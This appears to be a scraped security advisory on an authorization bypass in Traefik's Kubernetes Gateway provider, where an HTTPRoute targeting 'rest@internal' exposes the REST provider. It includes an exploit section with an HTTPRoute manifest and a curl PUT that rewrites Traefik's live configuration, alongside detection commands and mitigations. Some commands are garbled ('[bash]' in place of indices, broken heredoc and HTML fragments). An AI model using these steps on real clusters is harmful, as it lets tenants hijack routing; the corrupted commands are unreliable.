Traefik Kubernetes Gateway, Authorization Bypass via @internal, No CVE (medium)

Listen to this Post

How the vulnerability works:

The Traefik Kubernetes Gateway API provider incorrectly handles backend references whose names end with “@internal”. The function isInternalService() in pkg/provider/kubernetes/gateway/kubernetes.go returns true for any TraefikService name with that suffix, not only the intended “api@internal”. Then pkg/provider/kubernetes/gateway/httproute.go special-cases the first backend reference matching isInternalService() and directly assigns router.Service = string(routeRule.BackendRefs[bash].Name). This allows an HTTPRoute to target “rest@internal” in addition to “api@internal”. Separately, when providers.rest is enabled, Traefik always creates the REST provider handler in pkg/server/service/managerfactory.go, regardless of the providers.rest.insecure flag. That flag only controls whether Traefik’s built-in internal router exposes rest@internal, but does not disable the underlying service handler. The REST handler in pkg/provider/rest/rest.go accepts PUT /api/providers/rest for dynamic configuration updates. Consequently, a tenant with HTTPRoute creation permissions can publish “rest@internal” as a backend, reach the REST API, and send a PUT request to modify Traefik’s live configuration. This bypasses the intended restriction of providers.rest.insecure=false. The vulnerable code exists in v2.11.0 through v2.11.36, v3.0.0 through v3.6.7, and current master. The issue is an authorization bypass in shared Gateway deployments where the REST provider is enabled.

dailycve form:

Platform: Traefik K8s Gateway
Version: v2.11.x, v3.0-3.6.7
Vulnerability: No public CVE
Severity: medium
date: Not specified

Prediction: Already patched (v2.11.46, v3.6.17, v3.7.1)

What Undercode Say:

Check Traefik version

kubectl get deployment traefik -o jsonpath='{.spec.template.spec.containers[bash].image}’

Verify if REST provider is enabled

kubectl get configmap traefik-config -o yaml | grep -A2 “rest:”
Test for vulnerability: attempt to create HTTPRoute with rest@internal

<

h2 style=”color: blue;”>cat <

apiVersion: gateway.networking.k8s.io/v1

kind: HTTPRoute

metadata:

name: test-rest-internal

spec:

parentRefs:

  • name: shared-gateway

rules:

  • backendRefs:
  • group: traefik.io

kind: TraefikService

name: rest@internal

EOF

Check if route is accepted

kubectl get httproute test-rest-internal -o yaml

Exploit:

  1. Create HTTPRoute in tenant namespace pointing to rest@internal:

apiVersion: gateway.networking.k8s.io/v1

kind: HTTPRoute

metadata:

name: expose-rest

spec:

parentRefs:

  • name: shared-gateway

namespace: infra

hostnames:

  • rest.tenant.example

rules:

  • backendRefs:
  • group: traefik.io

kind: TraefikService

name: rest@internal

2. Send PUT request via the exposed route:

curl -X PUT http://rest.tenant.example/api/providers/rest \
-H “Content-Type: application/json” \
-d ‘{“http”:{“routers”:{“probe”:{“rule”:”PathPrefix(/probe)”,”service”:”noop@internal”}}}}’

Protection from this CVE:

  • Upgrade to patched versions: v2.11.46, v3.6.17, v3.7.1 or later.
  • If unable to upgrade, disable the REST provider entirely (set providers.rest: null).
  • Restrict HTTPRoute creation permissions to trusted tenants only.
  • Use network policies to block egress from Traefik pods to untrusted namespaces.
  • Implement admission webhooks to reject TraefikService backends with “@internal” suffix except “api@internal”.

Impact:

Low-privileged tenant with HTTPRoute create/update permissions gains live dynamic configuration write access to Traefik. This allows unauthorized creation/modification of routers and services, request interception/rerouting, exposure of other internal handlers, and denial of service via destructive config changes. Critical for shared Gateway deployments where REST provider is enabled.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top